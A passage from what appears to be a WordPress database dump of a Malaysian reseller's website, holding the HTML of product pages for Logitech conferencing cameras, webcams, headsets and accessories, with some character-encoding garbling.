data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"7f589de\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"7f589de\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n		<h3>EXTRAS PROVIDE MORE CONVENIENCE</h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.</p><h4>5X ZOOM</h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.</p><h4>PREMIUM CAMERA OPTICS</h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a â€œfisheyeâ€ effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.</p><h4>EXPANSION MIC-READY</h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUpâ€™s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.</p><h4>CERTIFIED FOR BUSINESS</h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.</p><h4>BLUETOOTHÂ® SPEAKERPHONE</h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices canâ€™t match.</p><h4>TAKE CONTROL</h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.</p><h4>VERSATILE TV MOUNT</h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.</p><h4>RIGHTSENSE</h4><p>Logitech RightSenseâ„¢ proactive technologies make better video meetings easy and automatic.HÂ® RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.</p><p>[maxbutton id=\"3\"]</p>','Logitech MEETUP','','inherit','closed','closed','','2928-revision-v1','','','2019-03-04 14:24:46','2019-03-04 06:24:46','',2928,'https://bintara.com.my/blog/2019/03/04/2928-revision-v1/',0,'revision','',0),(2970,1,'2019-03-04 14:27:39','2019-03-04 06:27:39','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-meetup/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-connect/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-ptz-pro-2/\" role=\"button\">\n						View\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-03-04 14:27:39','2019-03-04 06:27:39','',16,'https://bintara.com.my/blog/2019/03/04/16-revision-v1/',0,'revision','',0),(2971,1,'2019-03-04 14:29:31','2019-03-04 06:29:31','<h3>RALLY</h3>\nPremium Ultra-HD ConferenceCam system with automatic camera control\n<ul>\n 	<li>RightSenseâ„¢ technology automates a better user experience</li>\n 	<li>Modular audio for full coverage of medium to very large rooms</li>\n 	<li>Premium components and sleek industrial design</li>\n</ul>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" sizes=\"(max-width: 300px) 100vw, 300px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w\" alt=\"\" width=\"300\" height=\"262\" />\n<h3>ALL TOGETHER NOW</h3>\nLogitech Rally delivers studio-quality video, unmatched voice clarity, and RightSenseâ„¢ automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft SkypeÂ® for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger rooms.\n<h4>KEY FEATURES</h4>\nhttps://youtu.be/uwx62jjxOnE\n<h3>STUDIO-QUALITY VIDEO</h3>\nWith an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit conditions.\n<h3>ADVANCED MODULAR AUDIO</h3>\nCrystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound thatÂ’s natural, crisp, and highly intelligible. Logitech RightSoundÂ™â„¢ enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like sound.\n\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\n<h3>SLEEK INDUSTRIAL DESIGN</h3>\nEvery component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.\n<h3>ENHANCED USER EXPERIENCE</h3>\nLogitech RightSenseâ„¢ is a suite of technologies built into Rally that automate a better user experience. RightSightâ„¢ perfectly auto-frames participants no matter their distance from the lens. RightLightâ„¢ prioritizes faces over environment to render natural-looking skin tones while RightSoundÂ™â„¢ enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings â€” Â—automatically!\n\nhttps://youtu.be/-xGIqpPOyXs\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-768x433.jpg 768w\" alt=\"\" width=\"800\" height=\"451\" />\n<h3>SMART CABLING AND CONTENT SHARING</h3>\nWith a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.\n\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-768x433.jpg 768w\" alt=\"\" width=\"800\" height=\"451\" />\n<h4>ADDITIONAL FEATURES</h4>\n<h4>SEE EVERYONE, PERFECTLY FRAMED</h4>\nLogitech RightSightÂ™ camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.\n<h4>LET THE SUNSHINE IN</h4>\nEven in meeting rooms with bright windows, Logitech RightLightÂ™ technology with Wide Dynamic Range (WDR) prioritizes faces and human figures over objects and surfaces. The result is a balanced image that renders participants in flattering light with reduced glare and softer shadows, even in dim or backlit conditions\n<h4>ADAPTIVE PAN, TILT AND ZOOM</h4>\nPan and tilt speeds automatically adapt to the level of zoom. The result: faster camera movement when zoomed out for quick framing and slower camera movement when zoomed in for more control.\n<h4>FRONT OF ROOM AUDIO</h4>\nUnlike tabletop speakerphones that decouple voices from video, Rally speakers are designed for placement at the front of the room. By aligning speakers with the display, a person\'Â’s voice and video both come from the same place Â— and never from behind you â€” Â— so conversations feel more natural and lifelike.\n<h4>OPTIONAL MOUNTING KIT</h4>\nAdd Rally Mounting Kit for a streamlined installation of each component. Strong wall mounts allow ideal placement for the camera and two speakers, while ventilated mounting plates attach the display and table hubs on a wall or beneath a table. Two cleverly-designed retainers keep cables secure.\n<h4>LOUD AND CLEAR</h4>\nThe Rally display hub powers up to two speakers, providing rich sound even in larger rooms. A patent-pending suspension system virtually eliminates vibrations that travel through walls, stands, and tables. This improves echo cancellation while keeping video shake-free, even at high volume levels and when zoomed in.\n<h4>UP TO 7 MIC PODS</h4>\nFor rooms with more than 10 participants, add Rally Mic Pods to expand audio coverage and provide convenient access to mute controls. Each pod adds coverage for six more participants, so you can deploy Rally in large meeting spaces and boardrooms with up to 46 people.\n<h4>FLEXIBLE MIC POD CABLING</h4>\nA more flexible alternative to daisy-chain connections, Rally Mic Pod Hub makes it easy to run cables beneath the table with three connections for Rally Mic Pods or additional Mic Pod Hubs. With a single-cable connection, participants can reposition individual mic pods to make space on the table or to bring mute control within easy reach.\n\n[maxbutton id=\"3\" ]','Logitech RALLY','','inherit','closed','closed','','2906-autosave-v1','','','2019-03-04 14:29:31','2019-03-04 06:29:31','',2906,'https://bintara.com.my/blog/2019/03/04/2906-autosave-v1/',0,'revision','',0),(2972,1,'2019-03-04 14:42:38','2019-03-04 06:42:38','<h2>BCC950</h2><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p><ul><li>All-in-one design is easy to use and saves space</li><li>Plug-and-play convenience for Windows and Mac</li><li>Clear HD video and audio at an affordable price</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A GREAT VALUE FOR SMALL TEAMS</h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ALL-IN-ONE DESIGN</h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, itâ€™s everything you need to conduct a small video conference with up to 4 people in one room.</p><h3>PERFECT FOR PRODUCTIVE TEAMS</h3><p>With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EYE-TO-EYE</h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>NATURAL SOUND</h4><p>With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.</p><h4>HANDHELD REMOTE CONTROL</h4><p>Control BCC950â€™s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.</p><h4>USB PLUG-AND-PLAY CONNECTIVITY</h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. Thereâ€™s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.</p><h4>QUALITY OPTICS</h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180Â° across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.</p><p>[maxbutton id=\"3\" ]</p>','Logitech BCC950','','publish','closed','closed','','logitech-bcc950','','','2019-03-05 17:30:11','2019-03-05 